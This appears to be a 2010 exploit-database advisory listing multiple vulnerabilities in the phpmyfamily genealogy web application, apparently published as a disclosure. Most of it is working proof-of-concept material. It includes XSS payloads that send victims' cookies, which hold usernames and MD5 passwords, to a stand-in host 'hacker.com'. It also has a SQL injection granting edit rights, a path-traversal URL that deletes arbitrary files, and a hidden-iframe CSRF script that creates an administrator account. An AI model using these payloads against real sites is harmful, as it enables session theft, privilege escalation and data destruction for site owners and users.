Home / os / win7

[webapps / 0day] - phpmyfamily Multiple Remote Vulnerabiliti

Posted on 17 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>phpmyfamily Multiple Remote Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Abysssec' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===========================================
phpmyfamily Multiple Remote Vulnerabilities
===========================================

- Title  : phpmyfamily Multiple Remote Vulnerabilities.
- Affected Version : phpmyfamily  &lt;= 1.4.2
- Vendor  Site   : http://www.phpmyfamily.net/
- Discovery : Abysssec.com
  
- Description :
===============
phpmyfamily is a dynamic genealogy website builder which allows geographically dispersed family members
to maintain a central database of research which is readily accessable and editable. By having a central repository,
family members can contribute as and when information becomes available without requiring them to send it to a central &#039;custodian&#039;,
or disseminate via email, and allows anecdotal information and possible leads to be shared.
 
- Vulnerabilities:
==================
1)Information  Disclosure:
--------------------------         
    1-1)Directory listing:
    +POC:
        http://site.com/phpmyfamily/admin/
        http://site.com/phpmyfamily/docs/
        http://site.com/phpmyfamily/images/
        http://site.com/phpmyfamily/inc/
        http://site.com/phpmyfamily/lang/
        http://site.com/phpmyfamily/styles/
    +Fix:
        Create index.html in all folders.
         
    1-2)Cookie Info:   
        User&#039;s Cookie contions username and MD5 password.
  
2)XSS:
------
    +Example Vulnerable Code:
 
    inc/passwdform.inc.php[line41-42]
                @$reason = $_REQUEST[&quot;reason&quot;];
                echo &quot;&lt;font color=&quot;red&quot;&gt;&quot;.$reason.&quot;&lt;/font&gt;&quot;;
    +POC:
    This poc send victim&#039;s cookie(contions username and MD5 password) to attacker site.
    http://SITE.com/phpmyfamily/inc/passwdform.inc.php?reason=&lt;script&gt;document.write(&quot;&lt;img src=&#039;hacker.com/c.php?cookie=&quot;+document.cookie +&quot;&#039;/&gt;&quot;)&lt;/script&gt;
     
    +other poc:
    a)census.php[line23-26]
    http://SITE.com/phpmyfamily/census.php?ref=&lt;script&gt;document.write(&quot;&lt;img src=&#039;hacker.com/c.php?cookie=&quot;+document.cookie +&quot;&#039;/&gt;&quot;)&lt;/script&gt;
    b)mail.php[line 25-35]
    http://SITE.com/phpmyfamily/mail.php?referer=&lt;SCRIPT CODE&gt;
    c)track.php[line 23-26]
    http://SITE.com/phpmyfamily/track.php?person=&lt;SCRIPT CODE&gt;
    d)people.php[line ]
    http://SITE.com/phpmyfamily/people.php?person=1&gt;&quot;&gt;&lt;ScRiPt%20%0a%0d&gt;alert(404385187829)%3B&lt;/ScRiPt&gt;
 
3)Path Disclosure:
--------------------------------------
    +POC:
        http://SITE.com/phpmyfamily/admin.php?func=ged
        http://SITE.com/phpmyfamily/inc/gedcom.inc.php 
 
4)SQL Injection:
-------------
    Code:
    :my.php[line 32-33]
        $query = &quot;UPDATE &quot;.$tblprefix.&quot;users SET email = &#039;&quot;.$_POST[&quot;pwdEmail&quot;].&quot;&#039; WHERE id = &#039;&quot;.$_SESSION[&quot;id&quot;].&quot;&#039;&quot;;
        $result = mysql_query($query) or die(mysql_error());
    +POC:
        http://SITE.com/phpmyfamily/my.php?func=email&amp;pwdEmail=bbb@aa.com&#039;,edit=&#039;Y&#039;%00
        &lt;form method=&quot;post&quot; action=&quot;my.php?func=email&quot;&gt;
        &lt;input type=&quot;text&quot; name=&quot;pwdEmail&quot; value=&quot;bbb@aa.com&#039;,edit=&#039;Y&#039;;%00&quot;&gt;
        &lt;input type=&quot;submit&quot; value=&quot;send&quot;&gt;
        &lt;/form&gt;
    +Fix:
        use function quote_smart:
            $query = &quot;UPDATE &quot;.$tblprefix.&quot;users SET email = &#039;&quot;.quote_smart($_POST[&quot;pwdEmail&quot;]).&quot;&#039; WHERE id = &#039;&quot;.$_SESSION[&quot;id&quot;].&quot;&#039;&quot;;
    +other:
        track.php[line 145-148]     http://SITE.com/phpmyfamily/track.php
        passthru.php [line 221-220] http://SITE.com/phpmyfamily/passthru.php
        and ...
         
5)Delete File:
--------------
CMS&#039;s users can delete each file by this Vulnerability.
    +Code:  passthru.php line[218-219]
        $docFile = &quot;docs/&quot;.$_REQUEST[&quot;transcript&quot;];
        if (@unlink($docFile) || !file_exists($docFile))
    +POC:
        http://SITE.com/phpmyfamily/passthru.php?func=delete&amp;area=transcript&amp;person=00002&amp;transcript=../../../file.ext
    +Fix:
        use function quote_smart:
            $docFile = &quot;docs/&quot;.quote_smart($_REQUEST[&quot;transcript&quot;]);
 
6)XSRF:
-------
        +POC:
            &lt;script&gt;
                function creat_request(path,parameter,method){
                method = method || &quot;post&quot;;
                var remote_dive = document.createElement(&#039;div&#039;);
                remote_dive.id = &#039;Div_id&#039;;
                var style = &#039;border:0;width:0;height:0;&#039;;
                remote_dive.innerHTML = &quot;&lt;iframe name=&#039;iframename&#039; id=&#039;iframeid&#039; style=&#039;&quot;+style+&quot;&#039;&gt;&lt;/iframe&gt;&quot;;
                document.body.appendChild(remote_dive);
                var form = document.createElement(&quot;form&quot;);
                form.setAttribute(&quot;method&quot;, method);
                form.setAttribute(&quot;action&quot;, path);
                form.setAttribute(&quot;target&quot;, &quot;iframename&quot;);
                for(var key in parameter)
                {
                var hiddenField = document.createElement(&quot;input&quot;);
                hiddenField.setAttribute(&quot;type&quot;, &quot;hidden&quot;);
                hiddenField.setAttribute(&quot;name&quot;, key);
                hiddenField.setAttribute(&quot;value&quot;, parameter[key]);
                      form.appendChild(hiddenField);
                    }
                document.body.appendChild(form); 
                form.submit();
                }   
                creat_request(&#039;http://SITE.com/phpmyfamily/admin.php?func=add&#039;,{&#039;pwdUser&#039;:&#039;aaaa&#039;,&#039;pwdEmail&#039;:&#039;aa%40sss.com&#039;,&#039;pwdPwd1&#039;:&#039;123&#039;,&#039;pwdPwd2&#039;:&#039;123&#039;,&#039;pwdEdit&#039;:&#039;on&#039;,&#039;pwdRestricted&#039;:&#039;1910-01-01&#039;,&#039;pwdStyle&#039;:&#039;default&#039;,&#039;Create&#039;:&#039;Submit+Query&#039;});
            &lt;/script&gt;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-17]</pre></body></html>

 

TOP

Malware :

Exploits :